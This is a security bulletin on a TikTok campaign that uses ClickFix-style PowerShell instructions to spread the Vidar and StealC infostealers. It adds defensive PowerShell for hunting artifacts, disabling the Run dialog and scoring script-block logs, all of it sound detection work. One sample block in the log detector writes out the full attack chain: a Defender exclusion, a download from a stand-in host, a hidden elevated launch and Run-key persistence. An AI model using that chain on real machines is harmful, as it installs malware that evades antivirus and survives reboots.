TikTok Videos Promise Pirated Apps, Deliver Vidar and StealC Infostealers Instead
Summary:
Trend Micro researchers have identified a reportedly novel social engineering campaign that leverages TikTok's vast user base to distribute the Vidar and StealC information stealers at potentially high volume. The threat actors use short videos, likely AI-generated, that walk viewers through executing PowerShell commands under the guise of software activation steps. The step-by-step instructions in the videos mirror the ClickFix technique used to trick victims into running commands themselves. Some of the videos have significant reach: the most popular had over 20,000 likes, more than 100 comments, and almost 430,000 views. When executed, the PowerShell command creates hidden directories, adds them to Windows Defender's exclusions, and downloads a second-stage payload identified as either Vidar or StealC. The script then launches the payload as a hidden, elevated process and establishes persistence by creating a registry key that re-executes the script at startup. Once running, Vidar and StealC contact their C2 servers; notably, the Vidar samples abuse legitimate services such as Steam and Telegram as dead drop resolvers.
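The artifact chain described above (hidden per-user directories, Defender exclusions covering them, a hidden elevated launch, and Run-key persistence) is something a responder can hunt for on a host without the campaign's specific indicators. The script below is an added example written for this bulletin, not code from the Trend Micro post; the profile roots it checks, the registry keys, the depth limit and the "Microsoft" exclusion are assumptions chosen for illustration, and the real IOCs are in the linked post. Reading Defender exclusions requires an elevated session.

```powershell
# Added example, not code from the Trend Micro post: hunt a single Windows host
# for the artifact chain the summary describes. Profile roots, key names and the
# depth limit are assumptions chosen for illustration.

$profileRoots = @($env:APPDATA, $env:LOCALAPPDATA)
$findings = New-Object System.Collections.Generic.List[object]

function Test-HiddenProfilePath {
    param([string]$Path)
    # True when $Path is under a per-user profile root and its directory carries
    # the Hidden attribute: unprivileged, user-writable and invisible by default.
    foreach ($root in $profileRoots) {
        if ($Path -like "$root\*") {
            $dir = if (Test-Path -LiteralPath $Path -PathType Container) { $Path }
                   else { Split-Path -Parent $Path }
            if (Test-Path -LiteralPath $dir) {
                $attr = (Get-Item -LiteralPath $dir -Force).Attributes
                if ($attr -band [IO.FileAttributes]::Hidden) { return $true }
            }
        }
    }
    return $false
}

# 1. Defender path exclusions that point at hidden per-user directories
$exclusions = @()
try   { $exclusions = @((Get-MpPreference -ErrorAction Stop).ExclusionPath) }
catch { Write-Warning "Could not read Defender exclusions (run elevated): $_" }
foreach ($ex in $exclusions) {
    if (Test-HiddenProfilePath $ex) {
        $findings.Add([pscustomobject]@{ Type='DefenderExclusion'; Value=$ex; Detail='hidden dir under user profile' })
    }
}

# 2. Per-user Run/RunOnce values that launch hidden PowerShell or reference an excluded path
$metaProps = 'PSPath','PSParentPath','PSChildName','PSDrive','PSProvider'
foreach ($key in 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
                 'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce') {
    if (-not (Test-Path $key)) { continue }
    foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
        if ($p.Name -in $metaProps) { continue }
        $cmd = [string]$p.Value
        $hiddenPs = ($cmd -match '(?i)\b(powershell|pwsh)\b') -and ($cmd -match '(?i)-w(indowstyle)?\s+h(idden)?\b')
        $refsExclusion = [bool]($exclusions | Where-Object { $_ -and $cmd -like "*$_*" })
        if ($hiddenPs -or $refsExclusion) {
            $findings.Add([pscustomobject]@{ Type='RunKey'; Value="$key\$($p.Name)"; Detail=$cmd })
        }
    }
}

# 3. Executables inside hidden directories directly beneath the profile roots
foreach ($root in $profileRoots) {
    $hiddenDirs = Get-ChildItem -LiteralPath $root -Directory -Force -ErrorAction SilentlyContinue |
                  Where-Object { ($_.Attributes -band [IO.FileAttributes]::Hidden) -and $_.Name -ne 'Microsoft' }
    foreach ($d in $hiddenDirs) {
        $bins = Get-ChildItem -LiteralPath $d.FullName -File -Force -Recurse -Depth 1 -Include *.exe,*.dll -ErrorAction SilentlyContinue
        foreach ($b in $bins) {
            $findings.Add([pscustomobject]@{ Type='HiddenDirBinary'; Value=$b.FullName; Detail="created $($b.CreationTime)" })
        }
    }
}

if ($findings.Count) { $findings | Format-Table -AutoSize -Wrap } else { 'No matching artifacts found.' }
```

Each finding is a lead to review, not a verdict: a hidden folder under a profile root can be legitimate, but a hidden folder that is also a Defender exclusion and is referenced from a Run value launching hidden PowerShell matches the full chain and warrants isolating the host and pulling the referenced binary for analysis.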
Security Officer Comments:
This TikTok-based campaign is a concerning addition to the social engineering toolkit. The videos have achieved significant reach, with one garnering almost half a million views, 20,000 likes, and more than 100 comments; that level of trust and engagement may point to a correspondingly wide infection footprint. Video content, particularly AI-generated video with plausible-looking instructions, lowers the barrier for less-skilled threat actors to reach a broad audience and bypass traditional web-based security controls. Relying on spoken instructions to walk the victim through the ClickFix-style "Windows + R" routine and into running PowerShell commands is an effective evasion technique, since it leaves little detectable malicious code on the platform where the lure begins. TikTok's recommendation algorithm amplifies the potential impact, so businesses should enhance security awareness training, disable the "Windows + R" Run dialog where viable, and integrate social media threat intelligence feeds.
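One concrete way to act on the "disable Windows + R" suggestion is the Explorer "NoRun" policy, which removes the Run dialog for a user. The snippet below is an added example for this bulletin, not code from the Trend Micro post; the registry path is the standard Explorer policy location, while the function names are this example's own. It is a deterrent against the "press Win+R and paste this" lure, not a control over PowerShell itself: the victim can still open a console from the Start menu.

```powershell
# Added example, not from the Trend Micro post: set and verify the Explorer
# "NoRun" policy (removes the Run dialog / Win+R) for the current user.
# Function names are this example's own; the key path is the standard one.

$policyKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'

function Get-RunDialogState {
    $v = (Get-ItemProperty -Path $policyKey -Name NoRun -ErrorAction SilentlyContinue).NoRun
    if ($v -eq 1) { 'disabled' } else { 'enabled' }
}

function Set-RunDialogState {
    param([ValidateSet('enabled','disabled')][string]$State)
    if (-not (Test-Path $policyKey)) { New-Item -Path $policyKey -Force | Out-Null }
    $value = if ($State -eq 'disabled') { 1 } else { 0 }
    New-ItemProperty -Path $policyKey -Name NoRun -PropertyType DWord -Value $value -Force | Out-Null
    # Explorer reads the policy when it starts: the change takes effect at the
    # next logon or after Explorer is restarted.
}

"Run dialog before: $(Get-RunDialogState)"
Set-RunDialogState -State disabled
"Run dialog after:  $(Get-RunDialogState)"
```

In a managed environment deliver the same setting through Group Policy (User Configuration > Administrative Templates > Start Menu and Taskbar > "Remove Run menu from Start Menu") so it is enforced and re-applied rather than set once per machine, and pair it with PowerShell script block logging and awareness training, since the lure only needs any route to a console.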
Suggested Corrections:
IOCs are available here, at the end of the blog post.
Trend Micro advises that traditional security controls that focus on malicious code detection, link scanning, and domain reputation are less effective against attacks that exploit user trust and obscure malicious intent. Security strategies must adopt a more holistic approach that includes social media monitoring, behavioral analysis, and targeted user education. Addressing these attack vectors proactively will reduce the risk of mass compromise and help users and businesses alike:
- Expanding threat monitoring to social media platforms: Integrating social media threat intelligence feeds can help businesses track emerging campaigns and identify high-engagement content linked to unusual or technical instructions. Since threat actors often reuse content across multiple platforms, correlating posts across social media networks can reveal interconnected campaigns and even emerging threats.
- Incorporating behavioral analysis: With no malicious code embedded in the video or on the platform, detection has to rely on monitoring behavior on the endpoint. This includes identifying anomalous activity such as a user launching system utilities like PowerShell. Red flags also include unexpected command execution, direct downloads from unknown URLs, unauthorized creation of folders, and modifications to security settings.
- Strengthening social engineering awareness: Employee training must evolve beyond phishing to address tactics that exploit visual and auditory content on social media. Users should be encouraged to scrutinize unsolicited technical instructions, verify the legitimacy of video sources, and report suspicious content, whether on social media, messaging apps, or email. After all, if an offer seems too good to be true, it probably is.
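The behavioral red flags listed above (PowerShell execution, downloads from unknown URLs, folder creation, security setting changes) can be scored together from PowerShell script block logs, where the whole ClickFix command lands as one event. The script below is an added example written for this bulletin, not code from the Trend Micro post; the regexes, weights and alert threshold are assumptions chosen for illustration rather than signatures from the post, and the sample script blocks are constructed, not real campaign artifacts. Script block logging must be enabled for live 4104 events to exist.

```powershell
# Added example, not from the Trend Micro post: score PowerShell script-block
# log entries (event ID 4104, Microsoft-Windows-PowerShell/Operational) for the
# behaviour chain the bulletin describes. Regexes, weights and the threshold are
# assumptions for illustration; the sample blocks below are constructed.

$rules = @(
    [pscustomobject]@{ Name='DefenderExclusion'; Weight=3; Pattern='(?i)Add-MpPreference\s+-ExclusionPath' },
    [pscustomobject]@{ Name='HiddenDirectory';   Weight=1; Pattern='(?i)attrib\s+\+h|\.Attributes\s*=\s*.{0,3}Hidden' },
    [pscustomobject]@{ Name='RemoteDownload';    Weight=2; Pattern='(?i)\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadFile|DownloadString|curl|wget)\b' },
    [pscustomobject]@{ Name='HiddenElevated';    Weight=2; Pattern='(?i)Start-Process[^;|]*(-WindowStyle\s+Hidden|-Verb\s+RunAs)' },
    [pscustomobject]@{ Name='RunKeyPersistence'; Weight=2; Pattern='(?i)CurrentVersion\\Run(Once)?\b' }
)
$alertThreshold = 5   # assumption: a lone download (2) stays below it, exclusion + download does not

function Get-ScriptBlockScore {
    param([string]$Text)
    $score = 0; $matched = @()
    foreach ($r in $rules) {
        if ($Text -match $r.Pattern) { $score += $r.Weight; $matched += $r.Name }
    }
    [pscustomobject]@{ Score = $score; Matched = ($matched -join ','); Alert = ($score -ge $alertThreshold) }
}

function Get-LiveScriptBlocks {
    param([int]$Hours = 24)
    # Property index 2 of a 4104 event is ScriptBlockText.
    Get-WinEvent -FilterHashtable @{ LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104;
                                     StartTime=(Get-Date).AddHours(-$Hours) } -ErrorAction SilentlyContinue |
        ForEach-Object { [pscustomobject]@{ Time=$_.TimeCreated; Text=[string]$_.Properties[2].Value } }
}

# Constructed sample blocks for offline testing (not real campaign artifacts).
$samples = @(
    [pscustomobject]@{ Time=(Get-Date); Text='Get-ChildItem C:\Users | Where-Object Name -like "a*"' },
    [pscustomobject]@{ Time=(Get-Date); Text='iwr https://example.invalid/installer.exe -OutFile "$env:TEMP\installer.exe"' },
    [pscustomobject]@{ Time=(Get-Date); Text='$d="$env:APPDATA\x"; New-Item $d -ItemType Directory|Out-Null; (Get-Item $d).Attributes="Hidden"; Add-MpPreference -ExclusionPath $d; iwr https://example.invalid/a.exe -OutFile "$d\a.exe"; Start-Process "$d\a.exe" -WindowStyle Hidden -Verb RunAs; Set-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name a -Value "$d\a.exe"' }
)

$useLiveLog = $false   # set to $true to read the host's own 4104 events instead
$blocks = if ($useLiveLog) { Get-LiveScriptBlocks } else { $samples }

$results = foreach ($b in $blocks) {
    $r = Get-ScriptBlockScore -Text $b.Text
    if ($r.Score -gt 0) {
        [pscustomobject]@{ Time=$b.Time; Score=$r.Score; Alert=$r.Alert; Matched=$r.Matched
                           Snippet=$b.Text.Substring(0, [Math]::Min(60, $b.Text.Length)) }
    }
}
$results | Format-Table -AutoSize
```

On the constructed samples the first block scores 0, the lone download scores 2 and is not alerted, and the full chain scores 10 and is. The point of weighting rather than matching single commands is that each step alone (a download, a Defender exclusion, a Run key) has benign uses, while the combination inside one script block run from an interactive session is what the bulletin describes and is worth paging on.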
https://www.trendmicro.com/en_us/research/25/e/tiktok-videos-infostealers.html